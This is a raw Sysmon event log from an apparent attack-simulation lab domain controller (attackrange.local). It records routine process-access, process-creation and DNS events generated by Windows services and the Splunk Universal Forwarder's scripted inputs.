13:34:20.876{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002278Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:20.876{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002277Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:20.876{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002276Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:20.876{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002275Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:20.876{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002274Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:20.876{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-8E5C-6005-6700-00000000A301}3736C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002273Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:20.876{59A5CD1D-8E56-6005-3000-00000000A301}25323660C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-8E5C-6005-6700-00000000A301}3736C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7d35e7|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7cdcb9|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca4ec|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca0a3|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7c9f0d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6d7908|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6de2ee|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b29fa|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b4274|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e42dc|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ec682|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e9959|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7f31|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002272Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:20.878{59A5CD1D-8E5C-6005-6700-00000000A301}3736C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\powershell2.cmd" --scheme"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{59A5CD1D-8E56-6005-3000-00000000A301}2532C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 11241100x80000000000000002271Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:20.861{59A5CD1D-8E5B-6005-5F00-00000000A301}3424C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\Temp\__PSScriptPolicyTest_bozccpmt.pj3.ps12021-01-18 13:34:20.861 10341000x80000000000000002270Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:20.845{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E5B-6005-5F00-00000000A301}3424C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 22542200x80000000000000002269Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:17.740{59A5CD1D-8E56-6005-2F00-00000000A301}2276WIN-DC-4950fe80::16d:d52:d54:cffc;::ffff:10.0.1.14;C:\Windows\System32\dfsrs.exe 22542200x80000000000000002268Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:17.676{59A5CD1D-8E56-6005-2E00-00000000A301}24641.0.0.127.in-addr.arpa.0type: 12 win-dc-495.attackrange.local;C:\Windows\sysmon64.exe 10341000x80000000000000002267Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:20.767{59A5CD1D-8E58-6005-3A00-00000000A301}36643684C:\Windows\system32\conhost.exe{59A5CD1D-8E5C-6005-6600-00000000A301}3772C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002266Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:20.767{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002265Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:20.767{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002264Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:20.767{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002263Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:20.767{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002262Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:20.767{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002261Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:20.767{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002260Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:20.767{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002259Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:20.767{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002258Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:20.767{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002257Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:20.767{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-8E5C-6005-6600-00000000A301}3772C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002256Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:20.767{59A5CD1D-8E56-6005-3000-00000000A301}25323660C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-8E5C-6005-6600-00000000A301}3772C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7d35e7|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7cdcb9|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca4ec|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca0a3|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7c9f0d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6d7908|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6de2ee|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b29fa|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b4274|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e42dc|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ec682|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e9959|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7f31|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002255Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:20.769{59A5CD1D-8E5C-6005-6600-00000000A301}3772C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\powershell.cmd" --scheme"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{59A5CD1D-8E56-6005-3000-00000000A301}2532C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000002254Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:20.658{59A5CD1D-8E58-6005-3A00-00000000A301}36643684C:\Windows\system32\conhost.exe{59A5CD1D-8E5C-6005-6500-00000000A301}3756C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002253Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:20.658{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002252Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:20.658{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002251Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 